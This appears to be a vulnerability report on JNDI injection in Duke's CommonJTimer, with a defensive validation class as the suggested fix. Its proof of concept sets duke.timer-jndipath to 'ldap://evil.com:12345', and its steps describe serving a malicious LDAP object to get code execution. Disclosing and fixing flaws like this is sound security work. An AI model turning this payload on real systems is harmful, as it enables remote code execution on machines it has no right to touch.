Affected Version
Version 1.2 (the latest release at the time of writing) and all earlier versions.
Describe the vulnerability
no.priv.garshol.duke.server.CommonJTimer.init(Properties) initializes a CommonJ timer by reading the duke.timer-jndipath property and passing its value, without any validation, to a JNDI lookup. Because JNDI accepts URL-style names, an attacker who can influence that property value can point the lookup at a server they control; the lookup then resolves an object supplied by the attacker, which leads to execution of arbitrary code (JNDI injection). For instance, the following code makes the timer look up a name on an attacker-controlled LDAP server:
import java.util.Properties;
import no.priv.garshol.duke.server.CommonJTimer;

CommonJTimer timer = new CommonJTimer();
Properties timerProperties = new Properties();
// The JNDI name is taken verbatim from this property; an ldap:// URL
// redirects the lookup to a remote server controlled by the attacker.
timerProperties.setProperty("duke.timer-jndipath", "ldap://evil.com:12345");
timer.init(timerProperties); // performs the JNDI lookup of the attacker-supplied name
To Reproduce
Run an LDAP server at the address given in the property and have it answer the lookup with a malicious object (for example, a reference that causes the client to load and execute attacker-supplied code). Then execute the code above; the JNDI lookup performed by init() contacts the server and the payload runs in the Duke process.
Fix Suggestion
Validate the duke.timer-jndipath value before it reaches the lookup: reject names that carry a remote-capable URL scheme (ldap:, ldaps:, rmi:, iiop:, corbaname:, dns: and similar) and accept only container-local names (plain relative names or the java: scheme, e.g. java:comp/env/...), or better, compare the value against an explicit allowlist of expected timer names. Relying on the JDK default of com.sun.jndi.ldap.object.trustURLCodebase=false is not sufficient on its own, because an LDAP server can still return a serialized object whose deserialization triggers a gadget chain already present on the classpath.
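The following is an added example of that validation, not code from Duke itself: a hardened stand-in for the timer lookup that checks the configured JNDI name before calling InitialContext.lookup. The class name SafeTimerLookup, the method names, and the sample property values are assumptions made for this illustration; only the duke.timer-jndipath property name comes from the report.

```java
import java.util.Locale;
import java.util.Properties;
import java.util.Set;
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;

/**
 * Added example (not Duke's own code): validate a JNDI name taken from
 * configuration before it is handed to InitialContext.lookup, so that a
 * remote-capable URL scheme such as ldap:// or rmi:// is never resolved.
 */
public class SafeTimerLookup {

    // Property name from the report; the default value is an assumption.
    private static final String JNDI_PATH_PROPERTY = "duke.timer-jndipath";
    private static final String DEFAULT_JNDI_PATH = "java:comp/env/tm/TimerManager";

    // Schemes JNDI resolves inside the container. Everything else is refused,
    // so ldap:, ldaps:, rmi:, iiop:, corbaname:, dns: ... never reach lookup().
    private static final Set<String> ALLOWED_SCHEMES = Set.of("java");

    /** Mirrors how InitialContext detects a URL: a scheme is the text before
     *  the first ':' provided no '/' precedes it. Returns null if absent. */
    static String urlScheme(String name) {
        int colon = name.indexOf(':');
        int slash = name.indexOf('/');
        if (colon < 1 || (slash >= 0 && slash < colon)) {
            return null;
        }
        return name.substring(0, colon).toLowerCase(Locale.ROOT);
    }

    /** True only for names the lookup may safely resolve. */
    public static boolean isSafeJndiName(String name) {
        if (name == null || name.isBlank() || !name.equals(name.trim())) {
            return false;
        }
        String scheme = urlScheme(name);
        // No scheme: a relative name resolved in the container's initial context.
        return scheme == null || ALLOWED_SCHEMES.contains(scheme);
    }

    /** Hardened replacement for the unchecked lookup described in the report. */
    public static Object lookupTimer(Properties props) throws NamingException {
        String path = props.getProperty(JNDI_PATH_PROPERTY, DEFAULT_JNDI_PATH);
        if (!isSafeJndiName(path)) {
            // Fail closed: refuse to resolve anything that is not container-local.
            throw new IllegalArgumentException(
                "Refusing to resolve " + JNDI_PATH_PROPERTY + "=" + path
                + ": only local JNDI names are permitted");
        }
        Context ctx = new InitialContext();
        try {
            return ctx.lookup(path);
        } finally {
            ctx.close();
        }
    }

    public static void main(String[] args) {
        // Constructed sample values: the payload from the report and benign names.
        String[] samples = {
            "ldap://evil.com:12345",          // rejected (remote LDAP)
            "rmi://evil.com:1099/Exploit",    // rejected (remote RMI)
            "LDAP://evil.com/x",              // rejected (scheme check is case-insensitive)
            "java:comp/env/tm/TimerManager",  // accepted (container-local)
            "tm/TimerManager",                // accepted (relative name)
        };
        for (String s : samples) {
            System.out.println((isSafeJndiName(s) ? "accept " : "reject ") + s);
        }
    }
}
```

lookupTimer() throws before any network activity when the property carries a non-local scheme, so the LDAP server in the reproduction steps is never contacted. If the deployment only ever uses one timer name, tightening ALLOWED_SCHEMES into an allowlist of exact expected names is the stricter option.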